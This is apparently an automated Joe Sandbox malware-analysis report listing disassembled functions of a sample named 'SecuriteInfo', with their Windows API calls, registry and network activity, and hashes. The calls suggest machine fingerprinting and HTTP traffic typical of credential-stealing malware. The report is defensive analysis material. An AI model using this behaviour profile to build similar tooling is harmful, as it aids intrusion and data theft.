                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CharCloseOpenQueryValuememset
                                      • String ID: MachineGuid$SOFTWARE\Microsoft\Cryptography
                                      • API String ID: 2391366103-1211650757
                                      • Opcode ID: 26f8884b7aa3b977639a4551fc57c482a7712533724c4839cb31a1214305fedc
                                      • Instruction ID: 5d926ac6de816c91d803bc5d66e58ab4f529eb5b0e0fb0f4523521dcceec7497
                                      • Opcode Fuzzy Hash: 26f8884b7aa3b977639a4551fc57c482a7712533724c4839cb31a1214305fedc
                                      • Instruction Fuzzy Hash: B001717994020DBBDB64DB90DC4AFDAB778EB54700F1002D8F648A60C1DBB06BC98B50
                                      Function 00302FA0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 101stringCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FF850: lstrcpy.KERNEL32(00000000), ref: 002FF878
                                        • Part of subcall function 002F5010: InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 002F5062
                                        • Part of subcall function 002F5010: StrCmpCA.SHLWAPI(?,02F43058), ref: 002F507A
                                        • Part of subcall function 002F5010: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 002F50A2
                                        • Part of subcall function 002F5010: HttpOpenRequestA.WININET(00000000,GET,?,02F45FE0,00000000,00000000,-00400100,00000000), ref: 002F50DC
                                        • Part of subcall function 002F5010: InternetSetOptionA.WININET(00000000,0000001F,00010300,00000004), ref: 002F5100
                                        • Part of subcall function 002F5010: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 002F510F
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00302FFA
                                      • lstrlen.KERNEL32(00000000), ref: 00303011
                                        • Part of subcall function 00300DA0: LocalAlloc.KERNEL32(00000040,002F87D9,?,?,?,?,002F87D8,00000000,00000000), ref: 00300DBC
                                      • StrStrA.SHLWAPI(00000000,00000000), ref: 00303039
                                      • lstrlen.KERNEL32(00000000), ref: 0030304E
                                      • lstrlen.KERNEL32(00000000), ref: 0030306B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Internetlstrcpylstrlen$HttpOpenRequest$AllocConnectLocalOptionSend
                                      • String ID: ERROR
                                      • API String ID: 3240024479-2861137601
                                      • Opcode ID: ef989e1c41e99feccc16750c1d0e64ce52a2d1d86499e7f8d356369adb491a7e
                                      • Instruction ID: dd3940e1812ffb39c91284d8055b74b6dae78d8a42329a8cd1bffca5c4e774b1
                                      • Opcode Fuzzy Hash: ef989e1c41e99feccc16750c1d0e64ce52a2d1d86499e7f8d356369adb491a7e
                                      • Instruction Fuzzy Hash: F33185719211086BDBA5FB70DD669FDB76CAE147C0F444134FE0667292DF30AB24CA90
                                      Function 002F3D70 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 54stringnetworkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,?,00000001), ref: 002F3DA2
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,?,00000001), ref: 002F3DAF
                                      • ??_U@YAPAXI@Z.MSVCRT(00000400,00000400,00000400,?,00000001), ref: 002F3DBC
                                      • lstrlen.KERNEL32(00000000,00000000,0000003C,?,00000001), ref: 002F3DD6
                                      • InternetCrackUrlA.WININET(00000000,00000000,?,00000001), ref: 002F3DE6
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: CrackInternetlstrlen
                                      • String ID: <
                                      • API String ID: 1274457161-4251816714
                                      • Opcode ID: d76b5c98eb0933722b3588c4004747288f71b01ab2ecfde8a5741a9f58a1a09b
                                      • Instruction ID: ad3c5e675d1d9b62828ed62c04983d12d1d8ec1376b7a81425e38ad1582426bd
                                      • Opcode Fuzzy Hash: d76b5c98eb0933722b3588c4004747288f71b01ab2ecfde8a5741a9f58a1a09b
                                      • Instruction Fuzzy Hash: 33117C71D0020CABDB00EFA4E845BEDB7A8EF44310F04523AFA15AB390EF3199058B94
                                      Function 003005A0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 003005B5
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 003005BC
                                        • Part of subcall function 002FFA60: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFA75
                                        • Part of subcall function 002FFA60: RtlAllocateHeap.NTDLL(00000000), ref: 002FFA7C
                                        • Part of subcall function 002FFA60: RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 002FFA9B
                                        • Part of subcall function 002FFA60: RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002FFAB5
                                        • Part of subcall function 002FFA60: RegCloseKey.ADVAPI32(?), ref: 002FFABF
                                      • RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 003005F1
                                      • RegQueryValueExA.KERNEL32(?,02F45180,00000000,00000000,00000000,000000FF), ref: 0030060C
                                      • RegCloseKey.ADVAPI32(?), ref: 00300616
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: Windows 11
                                      • API String ID: 3225020163-2517555085
                                      • Opcode ID: d3941c1b912d1e98667ee15f95c4fe5456f578892dff25ade7b1b3c2355a4b24
                                      • Instruction ID: c65bbfdb386a43de0b3b92a4d08e95b2f6292ad38e07092792d07c7612e96d36
                                      • Opcode Fuzzy Hash: d3941c1b912d1e98667ee15f95c4fe5456f578892dff25ade7b1b3c2355a4b24
                                      • Instruction Fuzzy Hash: 8B01267460120CBBE724DBA4EC09FBA777CEF44301F004159FA08D3280D6709959ABA0
                                      Function 002FFA60 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40registrymemoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFA75
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFA7C
                                      • RegOpenKeyExA.KERNEL32(80000002,02F35198,00000000,00020119,?), ref: 002FFA9B
                                      • RegQueryValueExA.KERNEL32(?,CurrentBuildNumber,00000000,00000000,00000000,000000FF), ref: 002FFAB5
                                      • RegCloseKey.ADVAPI32(?), ref: 002FFABF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                      • String ID: CurrentBuildNumber
                                      • API String ID: 3225020163-1022791448
                                      • Opcode ID: 5c8cebccadf9a3e91b3b1b63b6071b65486b1760d0bd1739f226154e8ac14bcb
                                      • Instruction ID: febf2bd5d00a8ba5ef5514355a7bc04ea3ec8689022c7ead77e2aea273db9024
                                      • Opcode Fuzzy Hash: 5c8cebccadf9a3e91b3b1b63b6071b65486b1760d0bd1739f226154e8ac14bcb
                                      • Instruction Fuzzy Hash: 0EF0C2B5541308BBE724ABE0AC0AFFB7B7CEF59711F040154FA05A6180D7705A4897A1
                                      Function 002FFED0 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 39memoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFEDE
                                      • RtlAllocateHeap.NTDLL(00000000), ref: 002FFEE5
                                      • GlobalMemoryStatusEx.KERNEL32(?,?,00000000,00000040), ref: 002FFF05
                                      • wsprintfA.USER32 ref: 002FFF2B
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: Heap$AllocateGlobalMemoryProcessStatuswsprintf
                                      • String ID: %d MB$@
                                      • API String ID: 2922868504-3474575989
                                      • Opcode ID: 6e4445b4f29e9a3022ed7898c933b6bce3305b20c3e2b4e93f515c60fa75f960
                                      • Instruction ID: 2aadbbdfe7b8c8ca6e8d1976dbe0cef25def02bedcd4d582d0d5087fd63eb91b
                                      • Opcode Fuzzy Hash: 6e4445b4f29e9a3022ed7898c933b6bce3305b20c3e2b4e93f515c60fa75f960
                                      • Instruction Fuzzy Hash: 42F062B1A5021CABE714ABA8DC0AFBE77ACEF05344F400128F706E61C0D7649C0587A5
                                      Function 002F6C20 Relevance: 9.1, APIs: 6, Instructions: 71filememoryCOMMON
                                      Download Yara Rule
                                      APIs
                                      • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,00000000,?,002F1916,?), ref: 002F6C3F
                                      • GetFileSizeEx.KERNEL32(00000000,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6C55
                                      • LocalAlloc.KERNEL32(00000040,?,?,?,002F1916,?), ref: 002F6C70
                                      • ReadFile.KERNEL32(00000000,00000000,?,?,00000000,?,?,002F1916,?), ref: 002F6C89
                                      • LocalFree.KERNEL32(?,?,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CA9
                                      • CloseHandle.KERNEL32(00000000,?,002F1916,?,?,?,?,?,?,?,?,?,?,?,003101E9), ref: 002F6CB1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000406000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000417000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000458000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000045F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000466000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000047E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000485000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000498000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004A4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.00000000004F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000051A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000052B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000533000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694396727.0000000000535000.00000080.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2694425266.0000000000537000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_2f0000_SecuriteInfo.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                      • String ID:
                                      • API String ID: 2311089104-0
                                      • Opcode ID: d7ac34a9519c731048d85712a3bd389299e89ce12381a3da2bd62c0e7972e708
                                      • Instruction ID: 6c87416fd43da8408b59be7c4dad4e28844d6a2a7e8db31d249edf31f219a9fc
                                      • Opcode Fuzzy Hash: d7ac34a9519c731048d85712a3bd389299e89ce12381a3da2bd62c0e7972e708
                                      • Instruction Fuzzy Hash: C611A27121010AAFEB20DF64DC9CEBAB77DEF91780F104139FA8197290DB30AD569B60
                                      Function 003075F0 Relevance: 9.1, APIs: 6, Instructions: 67COMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F404B8), ref: 00307748
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F402C0), ref: 00307761
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F402D8), ref: 00307779
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F403E0), ref: 00307791
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3B368), ref: 003077AA
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F39F50), ref: 003077C2
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3A0B0), ref: 003077DA
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F404D0), ref: 003077F3
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40500), ref: 0030780B
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40578), ref: 00307823
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F40410), ref: 0030783C
                                        • Part of subcall function 003076E0: GetProcAddress.KERNEL32(76E00000,02F3A110), ref: 00307854
                                        • Part of subcall function 002FF810: lstrcpy.KERNEL32(00000000,00000001), ref: 002FF839
                                        • Part of subcall function 002FFAE0: GetProcessHeap.KERNEL32(00000000,00000104), ref: 002FFAEC
                                        • Part of subcall function 002FFAE0: RtlAllocateHeap.NTDLL(00000000), ref: 002FFAF3
                                        • Part of subcall function 002FFAE0: GetUserNameA.ADVAPI32(00000000,?), ref: 002FFB07
                                        • Part of subcall function 002FF9A0: lstrlen.KERNEL32(00000000,?,?,00000000,?,002F4732,?,------,?,?,?,--,00000000,?,00000000), ref: 002FF9B9
                                        • Part of subcall function 002FF9A0: lstrcpy.KERNEL32(00000000,?), ref: 002FF9E1
                                        • Part of subcall function 002FF9A0: lstrcat.KERNEL32(?,00000000), ref: 002FF9EB
                                        • Part of subcall function 002FF8F0: lstrcpy.KERNEL32(00000000), ref: 002FF930
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,02F3B2F8,?,00313414,?,00000000,003101E9), ref: 00307672
                                      • CloseHandle.KERNEL32(00000000), ref: 00307681
                                      • OpenEventA.KERNEL32(001F0003,00000000,00000000), ref: 00307697
                                      • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 003076B1
                                      • CloseHandle.KERNEL32(00000000), ref: 003076BF
                                      • ExitProcess.KERNEL32 ref: 003076C7
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.2693911043.00000000002F1000.00000040.00000001.01000000.00000003.sdmp, Offset: 002F0000, based on PE: true
                                      • Associated: 00000000.00000002.2693873375.00000000002F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000320000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000324000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.0000000000328000.00000040.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.2693911043.000000000033E000.00000040.00000001.01000000.00000003.sdmpDownload File
